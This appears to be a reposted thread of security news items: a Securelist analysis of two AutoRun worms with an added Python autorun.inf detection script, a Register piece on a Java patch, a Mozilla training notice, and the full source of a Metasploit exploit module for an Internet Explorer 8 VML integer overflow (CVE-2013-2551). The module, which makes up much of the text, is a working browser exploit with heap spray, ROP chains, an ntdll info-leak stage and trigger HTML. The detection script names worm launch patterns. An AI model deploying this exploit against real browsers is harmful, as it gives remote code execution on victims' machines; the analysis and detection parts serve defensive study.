Detection levels for unique script worms, AutoRun script worms, and heuristically detected AutoRun script worms, April 2012 – May 2013

Detection levels for Java worms, AutoRun Java worms, and heuristically detected AutoRun Java worms, August 2011 – May 2013

Both worms are polymorphic: they modify their bodies during propagation, complicating their detection. This is one of the reasons why they have become more prominent compared with “regular” worms. Below is a narrative of what we have encountered.

[h=2]Worm.Java.AutoRun[/h]

There are not many Java-based resident malware programs for PC, and worms are especially rare. So we undertook a detailed analysis of this sample. The worm deploys itself on an infected computer in the form of four files:

Java archive: the core component; its name changes in each infection attempt. It is located in the users’ temporary folder %TEMP%\jar_cache*.tmp.

Autorun.inf: a configuration file which ensures the worm is launched automatically when infected external storage media or a mounted network drive is opened.

DLL file: an auxiliary (Win 32) DLL which is responsible for part of the propagation task. The name of this file also varies: it is defined at the time when the computer is infected. The DLL is copied to the user’s temporary folder: %TEMP%\hsperfdata_%USERNAME%\

Java.exe: a legal executable file of the pre-installed JAVA package. The worm uses it to ensure it can always load itself into the memory of an infected computer. When an infection occurs, this executable file is copied from %ProgramFiles% to the user’s temporary folder (beside the above DLL) and is given a name associated with a system process, e.g. winlogon, csrss, or services. Then it is executed using the launch parameters of the Java archive, which is the core component.

Fragment of the class-file of a malicious JAVA archive

Once initialized, the malicious Java archive extracts a dll from itself, copies itself to the temporary user catalogue and also copies the executive file Java.exe from %ProgramFiles% to the same catalogue, giving it a “trusted” name and executing it with the launch parameters of the duplicated Java archive. Then the Java archive injects the above library into the process created to distribute the worm to any available network sections and removable media. The launched malware occasionally sends requests to a command center to receive instructions from the cybercriminal.

As well as these quirks, this worm also uses strong obfuscation. Here a packer is used in conjunction with Zelix KlassMaster obfuscation. Also, as mentioned above, the worm is polymorphic. This makes it more difficult for antivirus solutions to detect.

According to Kaspersky Security Network, the worm is most widely distributed in India and Malaysia. The overall picture is shown on the map below.

Geographical distribution of users protected against Worm.Java.AutoRun, January-May 2013

According to the same data, the worm was most frequently picked up by Kaspersky Lab products at the end of May. Most of these detections referred to its most recent modifications, those which provoked the sudden spike in detections. This worm is still actively distributing itself, so we are continuing to closely monitor its activities.

Number of users protected against Worm.Java.AutoRun, April-May 2013

[h=2]Worm.JS.AutoRun[/h]

The distribution model of this worm not only uses the above method with autorun.inf, but also FTP-servers, file share sites, shared folders and CD/DVDs burned on the infected computers. The worm multiplies itself in catalogues and adds its launch to auto launch. At this time it checks the environment where it was launched. If the worm is launched on a non-virtual machine, it starts to search for active monitoring and PC protection tools. If they are detected, the worm terminates their work.

The malware receives commands via a file downloaded from the command center. These instructions are mostly about collecting information from the infected system. In particular, cybercriminals want the worm to gather information about the system, the user and the installed software. Like Worm.Java.AutoRun, this sample is well-encrypted and can change its form in different infections.

Code fragment for Worm.JS.AutoRun

Like the Java worm, this malware is most widespread in Southeast Asia, though this variant is more active in Vietnam and Indonesia.

Geographical distribution of users protected from Worm.JS.AutoRun from the beginning of 2013 to the end of May, 2013

Number of users protected from Worm.JS.AutoRun from the beginning of 2013 till the end of May, 2013

In this diagram you can see the number of users protected with the signature method only. Far more users are protected with heuristic methods, as shown in the first diagram.

According to Kaspersky Security Network data, Windows XP is widely used in those countries with large numbers of malware detections. More recent Microsoft versions ask users to confirm autorun execution, which decreases the chances of getting infected. Starting from Windows 7, only CD/DVD carriers are allowed to run automatically. When using external storage devices (for instance, a USB flash drive), autorun is switched off.

In order to protect your computer from infection, we advise you to update critical OS units and antivirus databases installed on the computer. You will find the guidelines about how to set the autorun function and links to updates in the following Microsoft article: http://support.microsoft.com/kb/967715

Source: AutoRun. Reloaded - Securelist
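As an added illustration of the propagation mechanism described in the post above (example code written here, not Kaspersky's), a small Python triage routine that parses an autorun.inf found in the root of a removable or network volume and flags the traits the post attributes to these worms: a launcher handed a Java archive with -jar, a script file run directly or through wscript/cscript, and a binary carrying a system-process name such as winlogon outside the system directory. The autorun.inf contents and file names are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# autorun.inf keys that make Explorer run something when the volume is opened
LAUNCH_KEYS = ("open", "shellexecute")
SHELL_CMD_RE = re.compile(r"^shell\\[^\\]+\\command$")  # shell\<verb>\command=...
# the post says the copied java.exe is renamed after one of these system processes
SYSTEM_PROCESS_NAMES = {"winlogon.exe", "csrss.exe", "services.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")


def parse_autorun(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Parse INI-style autorun.inf text into {section: [(key, value), ...]}.

    Section and key names are lower-cased (Explorer treats them case-insensitively);
    duplicate keys are kept so nothing a padded file contains is silently dropped.
    """
    sections: Dict[str, List[Tuple[str, str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.lstrip("\ufeff").strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].append((key.strip().lower(), value.strip()))
    return sections


def launch_commands(sections: Dict[str, List[Tuple[str, str]]]) -> List[str]:
    """Every command line that [autorun] would hand to the shell, in file order."""
    return [v for k, v in sections.get("autorun", [])
            if k in LAUNCH_KEYS or SHELL_CMD_RE.match(k)]


def _split(command: str) -> List[str]:
    # split like the shell would, keeping quoted paths together, then drop the quotes
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command)]


def triage_autorun(text: str) -> List[Tuple[str, str]]:
    """Return (indicator, command) pairs; an empty list means nothing matched."""
    findings: List[Tuple[str, str]] = []
    for cmd in launch_commands(parse_autorun(text)):
        tokens = [t.lower().replace("/", "\\") for t in _split(cmd)]
        if not tokens:
            continue
        exe_path = tokens[0]
        exe = exe_path.rsplit("\\", 1)[-1]
        # Worm.Java.AutoRun: the launcher is handed a Java archive to run
        if "-jar" in tokens or any(t.endswith(".jar") for t in tokens):
            findings.append(("jar", cmd))
        # Worm.JS.AutoRun: a script file, directly or via wscript/cscript
        if exe in SCRIPT_HOSTS or any(t.endswith(SCRIPT_EXTS) for t in tokens):
            findings.append(("script", cmd))
        # a "trusted" system-process name that does not live under \system32\
        if exe in SYSTEM_PROCESS_NAMES and "\\system32\\" not in exe_path:
            findings.append(("masquerade", cmd))
    return findings


# Constructed samples for the example (not taken from a real infection).
SAMPLE_WORM = r"""[autorun]
open=winlogon.exe -jar jar_cache7f3a.tmp
shellexecute="java.exe" -jar "jar_cache7f3a.tmp"
shell\Open=Open
shell\Open\Command=wscript.exe //B updater.js
icon=setup.ico
"""

SAMPLE_BENIGN = r"""[AutoRun]
open=setup.exe /autorun
icon=setup.exe,0
label=Vendor Install CD
"""

if __name__ == "__main__":
    for name, sample in (("worm", SAMPLE_WORM), ("benign", SAMPLE_BENIGN)):
        print(name, triage_autorun(sample))
```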
  23. [h=1]Critical Java SE update due Tuesday fixes 40 flaws[/h]
[h=2]And yes, most are remotely exploitable[/h]

By Neil McAllister in San Francisco, 14th June 2013

Thought your Java security woes were behind you? Think again. Oracle is planning to release a Critical Patch Update on Tuesday that affects multiple versions of Java, and it's another doozy.

According to Oracle's security announcement, the patch pack addresses 40 different vulnerabilities. All update levels of Java SE 5, 6, and 7 are affected by the flaws, as are all versions of JavaFX. Of the 40 bugs, all but three are remotely exploitable over a network without the need for a username or password. Yes, that's bad.

Oracle ranks the severity of its flaws using the Common Vulnerability Scoring System (CVSS), and the top-ranked bug in this particular update rates a 10.0 – the highest possible score. "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible," the database giant helpfully suggests.

Oracle ordinarily releases Critical Patch Updates four times a year on a set schedule, but this will already be the fourth such update issued in 2013. The first shipped on February 1, but Oracle reissued it later in the month with additional fixes. It also scheduled another, previously unplanned update for April. Each of those earlier updates contained upward of 40 fixes, and each similarly addressed flaws that rated 10.0 on the CVSS severity scale.

Oracle has not yet disclosed which vulnerabilities will be patched by the June update, but previous Critical Patch Updates have patched vulnerabilities in a wide range of Java APIs and subsystems. These flaws could potentially affect a whole host of Java software and were not limited to programs running via the Java browser plugin, as has been the case with some previous Java exploits.

Oracle plans to release its latest Java SE Critical Patch Update on June 18, 2013. After that, the next update is currently scheduled for October 15. ®

Source: Critical Java SE update due Tuesday fixes 40 flaws • The Register
  24. [h=1]Web Developer Security 1.0[/h]

Raymond Forbes and I will be presenting Web Developer Security 1.0 on Tuesday, June 18th at 12:15 pm PDT. The training will be held in Mozilla’s Mountain View office and also broadcast online. We will cover a grab bag of proactive security measures Web Developers can take to protect their users and their site. Rather than focusing on how to attack a website, this training focuses on how you can safeguard your website from common threats. Some of the topics we will cover include Content Security Policy, X-Frame-Options, cookie security flags, iframe sandbox, content sanitization, and sensitive data encryption. Deploying these techniques will help protect your users and improve the security of your site. For those of you who are able to come watch the talk in person, there will be Punch & Pie! https://air.mozilla.org/web-security-training/

Source: Web Developer Security 1.0 | Mozilla Security Blog
  25. [h=1]MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow[/h]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "8.0",
    :ua_maxver  => "8.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :rank       => Rank
  })

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow",
      'Description'    => %q{
        This module exploits an integer overflow vulnerability on Internet Explorer.
        The vulnerability exists in the handling of the dashstyle.array length for
        vml shapes on the vgx.dll module. This module has been tested successfully
        on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default.
        In addition a target to use an info leak to disclose the ntdll.dll base
        address is provided. This target requires ntdll.dll v6.1.7601.17514 (the
        default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll
        v6.1.7601.17725 (version installed after apply MS12-001).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Joly', # Vulnerability discovery, PoC and analysis
          '4B5F5F4B',     # PoC
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-2551' ],
          [ 'OSVDB', '91197' ],
          [ 'BID', '58570' ],
          [ 'MSB', 'MS13-037' ],
          [ 'URL', 'http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php' ],
          [ 'URL', 'http://binvul.com/viewthread.php?tid=311' ]
        ],
      'Payload'        =>
        {
          'Space'          => 948,
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows 7 SP1 with JRE ROP', # default
            {
              'Rop'    => :jre,
              'Offset' => '0x5f4'
            }
          ],
          # requires:
          # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation)
          # * ntdll.dll v6.1.7601.17725 (MS12-001)
          [ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak',
            {
              'Rop'    => :ntdll,
              'Offset' => '0x5f4'
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 06 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def exploit
    @second_stage_url = rand_text_alpha(10)
    @leak_param = rand_text_alpha(5)
    super
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def ie_heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

    # Land the payload at 0x0c0c0c0c
    # For IE 8
    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def get_ntdll_rop
    case @ntdll_version
    when "6.1.7601.17514"
      stack_pivot = [
        @ntdll_base+0x0001578a, # ret # from ntdll
        @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll
        @ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll
      ].pack("V*")

      ntdll_rop = [
        @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory
        0x0c0c0c40,          # ret to shellcode
        0xffffffff,          # ProcessHandle
        0x0c0c0c34,          # ptr to BaseAddress
        0x0c0c0c38,          # ptr to NumberOfBytesToProtect
        0x00000040,          # NewAccessProtection
        0x0c0c0c3c,          # ptr to OldAccessProtection
        0x0c0c0c40,          # BaseAddress
        0x00000400,          # NumberOfBytesToProtect
        0x41414141           # OldAccessProtection
      ].pack("V*")

      return stack_pivot + ntdll_rop
    when "6.1.7601.17725"
      stack_pivot = [
        @ntdll_base+0x0001579a, # ret # from ntdll
        @ntdll_base+0x000096c9, # pop ebx # ret # from ntdll
        @ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll
      ].pack("V*")

      ntdll_rop = [
        @ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory
        0x0c0c0c40,          # ret to shellcode
        0xffffffff,          # ProcessHandle
        0x0c0c0c34,          # ptr to BaseAddress
        0x0c0c0c38,          # ptr to NumberOfBytesToProtect
        0x00000040,          # NewAccessProtection
        0x0c0c0c3c,          # ptr to OldAccessProtection
        0x0c0c0c40,          # BaseAddress
        0x00000400,          # NumberOfBytesToProtect
        0x41414141           # OldAccessProtection
      ].pack("V*")

      return stack_pivot + ntdll_rop
    else
      return ""
    end
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :jre
      print_status("Using JRE ROP")
      stack_pivot = [
        0x7c348b06, # ret # from msvcr71
        0x7c341748, # pop ebx # ret # from msvcr71
        0x7c348b05  # xchg eax, esp # ret from msvcr71
      ].pack("V*")
      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    when :ntdll
      print_status("Using ntdll ROP")
      rop_payload = get_ntdll_rop + payload.encoded
    end

    return rop_payload
  end

  def load_exploit_html(my_target, cli)
    p  = get_payload(my_target, cli)
    js = ie_heap_spray(my_target, p)

    js_trigger = %Q|
    var rect_array = new Array()
    var a = new Array()

    function createRects(){
      for(var i=0; i<0x1000; i++){
        rect_array[i] = document.createElement("v:shape")
        rect_array[i].id = "rect" + i.toString()
        document.body.appendChild(rect_array[i])
      }
    }

    function exploit(){
      var vml1 = document.getElementById("vml1")
      for (var i=0; i<0x1000; i++){
        a[i] = document.getElementById("rect" + i.toString())._anchorRect;
        if (i == 0x800) {
          vml1.dashstyle = "1 2 3 4"
        }
      }
      vml1.dashstyle.array.length = 0 - 1;
      vml1.dashstyle.array.item(6) = 0x0c0c0c0c;
      for (var i=0; i<0x1000; i++) {
        delete a[i];
        CollectGarbage();
      }
      location.reload();
    }
    |

    create_rects_func = "createRects"
    exploit_func = "exploit"

    if datastore['OBFUSCATE']
      js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
      js_trigger.obfuscate
      create_rects_func = js_trigger.sym("createRects")
      exploit_func = js_trigger.sym("exploit")
    end

    html = %Q|
    <html>
    <head>
    <script>
    #{js}
    </script>
    <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
    </head>
    <title> </title>
    <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
    <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
    <script>
    #{js_trigger}
    </script>
    <body onload="#{create_rects_func}(); #{exploit_func}();">
    <v:oval>
    <v:stroke id="vml1"/>
    </v:oval>
    </body>
    </html>
    |

    return html
  end

  def html_info_leak
    js_trigger = %Q|
    var rect_array = new Array()
    var a = new Array()

    function createRects(){
      for(var i=0; i<0x400; i++){
        rect_array[i] = document.createElement("v:shape")
        rect_array[i].id = "rect" + i.toString()
        document.body.appendChild(rect_array[i])
      }
    }

    function exploit(){
      var vml1 = document.getElementById("vml1")
      for (var i=0; i<0x400; i++){
        a[i] = document.getElementById("rect" + i.toString())._vgRuntimeStyle;
      }
      for (var i=0; i<0x400; i++){
        a[i].rotation;
        if (i == 0x300) {
          vml1.dashstyle = "1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44"
        }
      }
      var length_orig = vml1.dashstyle.array.length;
      vml1.dashstyle.array.length = 0 - 1;
      for (var i=0; i<0x400; i++) {
        a[i].marginLeft = "a";
        marginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16);
        if (marginLeftAddress > 0) {
          vml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300;
          var leak = a[i].marginLeft;
          vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress;
          vml1.dashstyle.array.length = length_orig;
          document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
          return;
        }
      }
    }
    |

    create_rects_func = "createRects"
    exploit_func = "exploit"

    if datastore['OBFUSCATE']
      js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
      js_trigger.obfuscate
      create_rects_func = js_trigger.sym("createRects")
      exploit_func = js_trigger.sym("exploit")
    end

    html = %Q|
    <html>
    <head>
    <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
    </head>
    <title> </title>
    <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
    <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
    <script>
    #{js_trigger}
    </script>
    <body onload="#{create_rects_func}(); #{exploit_func}();">
    <v:oval>
    <v:stroke id="vml1"/>
    </v:oval>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)

    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/
      html = html_info_leak
      html = html.gsub(/^\t\t/, '')
      print_status("Sending HTML to info leak...")
      send_response(cli, html, {'Content-Type'=>'text/html'})
    else
      leak = begin
        request.uri_parts["QueryString"][@leak_param].to_i
      rescue
        0
      end

      if leak == 0
        html = load_exploit_html(my_target, cli)
        html = html.gsub(/^\t\t/, '')
        print_status("Sending HTML to trigger...")
        send_response(cli, html, {'Content-Type'=>'text/html'})
        return
      end

      vprint_status("ntdll leak: 0x#{leak.to_s(16)}")
      fingerprint = leak & 0x0000ffff
      case fingerprint
      when 0x70B0
        @ntdll_version = "6.1.7601.17514"
        @ntdll_base = leak - 0x470B0
      when 0x7090
        @ntdll_version = "6.1.7601.17725" # MS12-001
        @ntdll_base = leak - 0x47090
      else
        print_error("ntdll version not detected, sending 404: #{agent}")
        send_not_found(cli)
        return
      end

      html = load_exploit_html(my_target, cli)
      html = html.gsub(/^\t\t/, '')
      print_status("Sending HTML to trigger...")
      send_response(cli, html, {'Content-Type'=>'text/html'})
    end
  end
end

Source: MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow